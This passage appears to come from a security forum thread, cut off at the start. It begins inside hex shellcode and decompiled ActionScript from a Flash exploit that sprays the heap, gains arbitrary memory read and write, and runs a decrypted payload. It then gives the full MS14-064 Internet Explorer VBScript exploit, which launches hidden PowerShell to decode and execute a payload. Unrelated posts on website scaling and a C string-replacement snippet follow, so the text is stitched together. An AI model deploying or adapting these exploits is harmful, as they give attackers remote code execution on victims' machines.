c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc"; var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36); this.writeUnsignedInt(this.heapSprayObjAddr, _local37); var _local38:ByteArray = (new this.keyClass() as ByteArray); var _local39:ByteArray = new ByteArray(); _local38.readBytes(_local39, 0, 0x0100); _local38.endian = Endian.LITTLE_ENDIAN; _local38.position = 0x0100; this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; ByteArray(this.jpgLoader.data).position = 
```actionscript
            _local38.readInt();
            ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0);
            this.jpgBytes = this.encryption(this.jpgBytes, _local39);
            this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
            this.jpgBytes.position = 0;
            var _local40:* = this.jpgBytes.length;
            var _local41:int;
            var _local42:uint;
            while (((_local41 + 1) * 4) < _local40) {
                _local42 = this.jpgBytes.readInt();
                try {
                    this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42);
                } catch(e:Error) {
                };
                _local41++;
            };
            var _local43:uint = this.readUnsignedInt(_local7);
            this.writeUnsignedInt(_local7, _local28);
            this.sndObj.toString();
            this.writeUnsignedInt(_local7, _local43);
            _local31.position = 0;
            _local6 = 0;
            while (_local6 < (_local31.length / 4)) {
                var _temp30 = _local6;
                _local6 = (_local6 + 1);
                this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt());
            };
            _local30.position = 0;
            _local6 = 0;
            while (_local6 < (_local30.length / 4)) {
                var _temp31 = _local6;
                _local6 = (_local6 + 1);
                this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt());
            };
            this.setsharobject();
            return (this.safe_exit());
        }
        public function safe_exit():void{
            this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen);
            this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr);
            this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen);
        }
        public function logMsg(_arg1:String):void{
            if (ExternalInterface.available){
            };
        }
        public function get_address(_arg1:String):uint{
            var _local2:uint;
            if (ExternalInterface.available){
                _local2 = ExternalInterface.call(_arg1, "");
            };
            return (_local2);
        }
        public function exception_exit():void{
            if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){
                this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen;
            };
        }
        private function read4bytes(_arg1:uint):uint{
            var _local2:uint;
            if (_arg1 > this.controlledAddr){
                _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)];
            } else {
                _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))];
            };
            return (_local2);
        }
        private function readUnsignedInt(_arg1:uint):uint{
            var _local2:uint;
            var _local3:uint;
            var _local4:uint;
            if ((_arg1 % 4) == 0){
                _local4 = this.read4bytes(_arg1);
            } else {
                if ((_arg1 % 4) == 1){
                    _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF);
                    _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000);
                    _local4 = (_local2 + _local3);
                } else {
                    if ((_arg1 % 4) == 2){
                        _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF);
                        _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000);
                        _local4 = (_local2 + _local3);
                    } else {
                        _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF);
                        _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00);
                        _local4 = (_local2 + _local3);
                    };
                };
            };
            return (_local4);
        }
        private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{
            if (_arg1 > this.controlledAddr){
                this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2;
            } else {
                this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2;
            };
        }
        public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{
            var _local3:ByteArray = new ByteArray();
            var _local4:uint = _arg1.length;
            _local3 = this.rc4_crypt(_arg2, _arg1, _local4);
            return (_local3);
        }
        public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{
            var _local4:int;
            var _local5:int;
            var _local6:int;
            var _local7:uint;
            var _local8:uint;
            var _local9:ByteArray = new ByteArray();
            while (_local7 < _arg3) {
                _local4 = ((_local4 + 1) % 0x0100);
                _local5 = ((_local5 + _arg1[_local4]) % 0x0100);
                _local8 = _arg1[_local4];
                _arg1[_local4] = _arg1[_local5];
                _arg1[_local5] = _local8;
                _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100);
                _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]);
                _local7++;
            };
            return (_local9);
        }
        private function HexString2ByteArray(_arg1:String):ByteArray{
            var _local2:String;
            var _local3:uint = _arg1.length;
            var _local4:uint;
            var _local5:ByteArray = new ByteArray();
            _local5.endian = Endian.LITTLE_ENDIAN;
            while (_local4 < _local3) {
                _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
                _local5.writeByte(parseInt(_local2, 16));
                _local4 = (_local4 + 2);
            };
            return (_local5);
        }
        private function writeString(_arg1:int, _arg2:String):int{
            var _local3:int;
            var _local4:int;
            var _local5:int;
            var _local6:ByteArray = this.HexString2ByteArray(_arg2);
            while (_local3 < (_arg2.length / 2)) {
                _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]);
                _local3 = (_local3 + 4);
                this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5);
                _local4++;
            };
            return ((_arg1 + (_local4 * 4)));
        }
        private function checkProperty():Boolean{
            var _local1:int;
            while (_local1 < this.heapSprayLenByEnv20W) {
                if (this.vtObj20W[_local1].length == 1073741823){
                    break;
                };
                _local1++;
            };
            if (_local1 == this.heapSprayLenByEnv20W){
                return (false);
            };
            this.changedPropertyObjIndex = _local1;
            return (true);
        }
    }
}//package

class theoutobj {
    public function theoutobj(){
    }
    public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{
        var _local4:uint;
        return (_local4);
    }
}
```

Source: Exploit.SWF.CVE-2014-6332 - Pastebin.com
  19. [h=1]Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)[/h]

```html
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11            |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/     |
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec)         |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual   |
| Usage: http://www.fuzzysecurity.com/exploits/21.html                     |
|--------------------------------------------------------------------------|

Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ???????????

|--------------------------------------------------------------------------|
</pre>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
payload="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"
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
shell.ShellExecute "powershell", params, "", "", 0
end function
</script>

<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0) then
     exit function
  end if
  if (instr(info,"MSIE")>0) then
     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
     myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
         setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '  document.write(i)
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314
    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)
            redim Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    If(IsObject(aa(a1-1)) = False) Then
        if(intVersion<4) then
            mem=cint(a0+1)*16
            j=vartype(aa(a1-1))
            if((j=mem+4) or (j*8=mem+8)) then
                if(vartype(aa(a1-1))<>0) Then
                    If(IsObject(aa(a1)) = False ) Then
                        type1=VarType(aa(a1))
                    end if
                end if
            else
                redim Preserve aa(a0)
                exit function
            end if
        else
            if(vartype(aa(a1-1))<>0) Then
                If(IsObject(aa(a1)) = False ) Then
                    type1=VarType(aa(a1))
                end if
            end if
        end if
    end if
    If(type1=&h2f66) Then
        Over=True
    End If
    If(type1=&hB9AD) Then
        Over=True
        win9x=1
    End If
    redim Preserve aa(a0)
end function

function ReadMemo(add)
    On Error Resume Next
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))
    ab(0)=0
    redim Preserve aa(a0)
end function
</script>
</body>
</html>
```

Source: http://www.exploit-db.com/exploits/35308/
  20. An example from last year: how the company Distinct "took care" of Evomag. Bogdan Belu, CEO of Distinct, spoke at Internet and Mobile World about scalability problems and solutions under high traffic. The talk was titled "Case study: How Distinct helped evoMAG.ro cope with the Black Friday 2013 traffic peak" (original title: "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013").

Summary: Scaling your website to accept a large increase in customers over a short period of time is a challenge for every party involved (network administrators, datacenter, software developers, webmasters). This talk is about how we scaled the website of the IT retailer evoMAG.ro (home appliances and electronics online at the best price) during the Black Friday 2013 event, which problems were common and which solutions we identified.

Slides: "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013" (PDF, English)

Video here: IMWORLD 2014 - Prezentare Bogdan Belu: Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013
  21. @MrGrj :
- strstr - walks the character string
- strcpy - walks the character string
- strlen - walks the character string

Avoid strlen (by specifying the size) and strstr (by processing the string manually). Suck it, em.
  22. Read and understand the code, boss. You said it should be O(n).
  23. 

```c
#include <stdio.h>
#include <string.h>

int main(void) {
    char sir_initial[] = "Ana are mere!";
    char sir_inlocuire[] = "_spatiu_";
    char sir_nou[1024] = {0};
    size_t sir_lungime = 13;      /* known length of sir_initial, so no strlen() call */
    size_t sir_inloc_lungime = 8; /* known length of sir_inlocuire */
    size_t pos_nou = 0;
    size_t i = 0;

    /* one pass over the input: every character is visited exactly once, O(n) */
    while (i < sir_lungime) {
        /* stop before the output buffer could overflow */
        if (pos_nou + sir_inloc_lungime >= sizeof(sir_nou))
            break;
        if (sir_initial[i] == ' ') {
            /* copy the replacement where the space would have gone */
            memcpy(sir_nou + pos_nou, sir_inlocuire, sir_inloc_lungime);
            pos_nou += sir_inloc_lungime;
            i++;
        } else {
            sir_nou[pos_nou++] = sir_initial[i++];
        }
    }
    printf("%s\n", sir_nou); /* Ana_spatiu_are_spatiu_mere! */
    return 0;
}
```
  24. Maybe after the conference ends the recordings of the talks (video) and the slides (pdf/pptx) will also be published on the site.
  25. Duie MIICOT.